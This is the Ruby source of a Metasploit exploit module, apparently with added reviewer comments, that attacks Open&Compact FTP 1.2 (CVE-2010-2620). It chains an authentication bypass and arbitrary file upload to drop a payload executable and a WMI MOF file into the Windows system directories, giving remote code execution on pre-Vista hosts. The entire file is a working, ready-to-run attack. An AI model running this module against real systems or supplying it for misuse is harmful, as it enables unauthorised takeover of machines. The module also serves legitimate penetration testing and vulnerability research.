Path: blob/master/modules/exploits/windows/ftp/open_ftpd_wbem.rb
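##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Open&Compact FTP 1.2 ("Open-FTPD"): unauthenticated arbitrary file upload
# chained with a MOF drop into the WMI directory (see 'Description' below).
#
# Flow: exploit() pre-builds the payload EXE and the MOF, then spawns a thread
# that issues two FTP uploads in active mode (PORT), while super (the TcpServer
# mixin) listens on SRVPORT; on_client_connect() serves the EXE on the first
# inbound data connection and the MOF on the second.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Ftp
  include Msf::Exploit::Remote::TcpServer
  include Msf::Exploit::EXE
  include Msf::Exploit::WbemExec
  include Msf::Exploit::FileDropper

  # Module metadata and options. FTPUSER/FTPPASS are deregistered because the
  # login step is bypassed; only PATH (remote Windows root) and SRVPORT (our
  # active-mode listener port) are needed on top of the Ftp/TcpServer defaults.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "Open-FTPD 1.2 Arbitrary File Upload",
        'Description' => %q{
          This module exploits multiple vulnerabilities found in Open&Compact FTP
          server. The software contains an authentication bypass vulnerability and a
          arbitrary file upload vulnerability that allows a remote attacker to write
          arbitrary files to the file system as long as there is at least one user
          who has permission.

          Code execution can be achieved by first uploading the payload to the remote
          machine as an exe file, and then upload another mof file, which enables
          WMI (Management Instrumentation service) to execute the uploaded payload.
          Please note that this module currently only works for Windows before Vista.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Serge Gorbunov', # Initial discovery
          'bcoles', # Metasploit
        ],
        'References' => [
          ['OSVDB', '65687'],
          ['EDB', '13932'],
          ['CVE', '2010-2620']
        ],
        'Payload' => {
          'BadChars' => "\x00",
        },
        'Platform' => 'win',
        'Stance' => Msf::Exploit::Stance::Aggressive,
        'Targets' => [
          # Tested on version 1.2 - Windows XP SP3 (EN)
          ['Open&Compact FTP 1.2 on Windows (Before Vista)', {}]
        ],
        'Privileged' => true,
        'DisclosureDate' => '2012-06-18',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options([
      OptString.new('PATH', [true, 'The local Windows path', "C:/WINDOWS/"]),
      OptPort.new('SRVPORT', [true, 'The local port to listen on for active mode', 8080])
    ])
    deregister_options('FTPUSER', 'FTPPASS') # Using authentication bypass
  end

  # Banner-only fingerprint: opens and closes the control connection, then
  # matches the greeting the Ftp mixin captured in `banner`. This only proves
  # the product is present, not that it is a vulnerable version, hence
  # Detected rather than Appears/Vulnerable.
  def check
    connect
    disconnect

    # `banner =~` (not match?) tolerates a nil banner when nothing was read.
    if banner =~ /\*\* Welcome on \*\*/
      Exploit::CheckCode::Detected
    else
      Exploit::CheckCode::Unknown
    end
  end

  # TcpServer callback for each inbound connection on SRVPORT (presumably the
  # target's active-mode data connection opened after our PORT/STOR; verify
  # against the Ftp mixin). Serves whichever file @stage points at: the EXE on
  # the first connection, then flips to :mof so the second connection gets the
  # MOF. Any further connection gets nothing and is just closed.
  def on_client_connect(cli)
    case @stage
    when :exe
      print_status("Sending executable (#{@exe.length} bytes)")
      cli.put(@exe)
      @stage = :mof
    when :mof
      print_status("Sending MOF (#{@mof.length} bytes)")
      cli.put(@mof)
    end

    cli.close
  end

  # Largely stolen from freefloatftp_wbem.rb
  #
  # Drives one active-mode STOR for `filename` over a fresh control connection.
  # The file content itself is not sent here: STOR makes the server connect back
  # to SRVHOST:SRVPORT and on_client_connect() supplies the bytes.
  # Returns whatever disconnect(conn) returns; raises via fail_with when the
  # control connection cannot be opened.
  def upload(filename)
    # One-second pause (select with no fds and a timeout) before each attempt.
    select(nil, nil, nil, 1)

    peer = "#{rhost}:#{rport}"
    print_status("Trying to upload #{::File.basename(filename)}")
    # Non-global connection so the socket is returned (nil on failure) instead of
    # being stored in self.sock.
    conn = connect(false, datastore['VERBOSE'])
    # Was "#{@peer} ..." — @peer is never assigned in this module, so the message
    # lost its host:port; use the local built above.
    fail_with(Failure::Unreachable, "#{peer} - Connection failed") unless conn

    # Switch to binary mode
    print_status("Set binary mode")
    send_cmd(['TYPE', 'I'], true, conn)

    # Prepare active mode: Get attacker's IP and source port.
    # A wildcard SRVHOST is useless in a PORT command, so substitute the address
    # the target would see us from.
    src_ip = datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket.source_address : datastore['SRVHOST']
    src_port = datastore['SRVPORT'].to_i

    # Prepare active mode: Convert the IP and port to PORT's h1,h2,h3,h4,p1,p2 form
    src_ip = src_ip.tr('.', ',')
    src_port = "#{src_port / 256},#{src_port.remainder(256)}"

    # Set to active mode
    print_status("Set active mode \"#{src_ip},#{src_port}\"")
    send_cmd(['PORT', "#{src_ip},#{src_port}"], true, conn)

    # Tell the FTP server to download our file. The second argument is false so
    # we do not block on a reply here; the transfer completes through the
    # TcpServer side (on_client_connect) rather than on this socket.
    send_cmd(['STOR', filename], false, conn)

    print_good("Upload successful")
    disconnect(conn)
  end

  # Largely stolen from freefloatftp_wbem.rb
  #
  # Builds the EXE payload and the MOF that references it, stages them for
  # on_client_connect(), then runs the uploads in a background thread while
  # super (TcpServer#exploit) runs the listener in the foreground. The thread
  # is always killed on the way out, even if the listener raises.
  def exploit
    path = datastore['PATH']
    # Random 5-14 character basenames under system32 / system32\wbem\mof.
    exe_name = "#{path}/system32/#{rand_text_alpha(rand(10) + 5)}.exe"
    mof_name = "#{path}/system32/wbem/mof/#{rand_text_alpha(rand(10) + 5)}.mof"
    @mof = generate_mof(::File.basename(mof_name), ::File.basename(exe_name))
    @exe = generate_payload_exe
    @stage = :exe

    begin
      t = framework.threads.spawn("reqs", false) {
        begin
          # Upload our malicious executable
          u = upload(exe_name)
          # Upload the mof file
          # NOTE(review): `u` is the return value of disconnect(conn) inside
          # upload(); if that is ever nil/false the MOF upload is skipped
          # silently — confirm the mixin's return value.
          upload(mof_name) if u
          # Cleanup paths are relative to the FTP session's cwd; the 'good'
          # subdirectory is presumably where WMI moves a processed MOF — verify.
          register_file_for_cleanup("#{::File.basename(exe_name)}")
          register_file_for_cleanup("wbem\\mof\\good\\#{::File.basename(mof_name)}")
        rescue ::Exception => e
          # Kept as in the original: ::Exception also catches non-StandardError
          # errors so the thread never dies without reporting and cleaning up.
          print_error "Upload Failed: #{e.message}"
          cleanup
        end
      }

      super
    ensure
      # Guarded: if spawn itself raised, `t` is nil and a bare t.kill would
      # mask the original error with a NoMethodError.
      t.kill if t
    end
  end
end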